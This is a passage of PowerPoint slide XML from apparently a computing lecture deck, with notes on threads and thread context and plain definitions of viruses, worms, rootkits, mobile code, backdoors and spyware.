            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>trong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>mục</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>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94</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1843242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Threads are independent sequences of instructions that are executed by the CPU without waiting for other threads.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>A process contains one or more threads, which execute part of the code within a process.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Threads within a process all share the same memory space, but each has its own processor registers and stack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>When one thread is running, it has complete control of the CPU, or the CPU core, and other threads cannot affect the state of the CPU or core.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Before an OS switches between threads, all values in the CPU are saved in a structure called the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>thread context</a:t>
            </a:r>
          </a:p>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106</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="345791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108</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2404037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113</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="802357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123</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2955560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126</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3213678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128</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="69233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A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="1" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>computer virus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> is a type of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId3" tooltip="Malicious software"/>
              </a:rPr>
              <a:t>malicious software</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> that, when executed, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId4" tooltip="Quine (computing)"/>
              </a:rPr>
              <a:t>replicates</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> itself by modifying other </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId5" tooltip="Computer program"/>
              </a:rPr>
              <a:t>computer programs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> and inserting its own code.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>[1]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> When this replication succeeds, the affected areas are then said to be "infected" with a computer virus.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="1" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>computer worm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> is a standalone </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId7" tooltip="Malware"/>
              </a:rPr>
              <a:t>malware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="120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hlinkClick r:id="rId5" tooltip="Computer program"/>
              </a:rPr>
              <a:t>computer program</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> that replicates itself in order to spread to other computers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="1" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>rootkit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> is a collection of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId8" tooltip="Software"/>
              </a:rPr>
              <a:t>computer software</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>, typically </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId7" tooltip="Malware"/>
              </a:rPr>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>, designed to enable access to a computer or an area of its software that is not otherwise allowed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="1" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Malicious mobile code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>is becoming a popular way to get malware installed on a computer. Malicious mobile code is malware that is obtained from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>remote servers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>transferred across a network</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>, and then </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>downloaded on to your computer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>. This type of code can be transmitted through interactive Web applications such as ActiveX controls, Flash animation, or JavaScript.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="1" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>backdoor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> is a method, often secret, of bypassing normal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId9" tooltip="Authentication"/>
              </a:rPr>
              <a:t>authentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> or encryption in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId10" tooltip="Computer"/>
              </a:rPr>
              <a:t>computer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> system, a product, or an embedded device (e.g. a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId11" tooltip="Home router"/>
              </a:rPr>
              <a:t>home router</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>), or its embodiment, e.g. as part of a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId12" tooltip="Cryptosystem"/>
              </a:rPr>
              <a:t>cryptosystem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>, an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId13" tooltip="Algorithm"/>
              </a:rPr>
              <a:t>algorithm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>, a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId14" tooltip="Chipset"/>
              </a:rPr>
              <a:t>chipset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>, or a "homunculus computer" —a tiny computer-within-a-computer (such as that as found in Intel's </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId15" tooltip="Intel Active Management Technology"/>
              </a:rPr>
              <a:t>AMT technology</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16"/>
              </a:rPr>
              <a:t>[1]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId17"/>
              </a:rPr>
              <a:t>[2]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Backdoors are often used for securing remote access to a computer, or obtaining access to </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="1" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Spyware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> is software that aims to gather information about a person or organization, sometimes without their knowledge, that may send such information to another entity without the consumer's consent, that asserts control over a device without the consumer's knowledge, or it may send such information to another entity with the consumer's consent, through cookies .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId18"/>
              </a:rPr>
              <a:t>[1]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId19" tooltip="Plaintext"/>
              </a:rPr>
              <a:t>plaintext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" u="sng" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId20"/>
              </a:rPr>
              <a:t>cryptographic systems</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1E03A334-FE4D-4C3E-A61B-575B8EC3A56A}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>9</a:t>
            </a:fld>
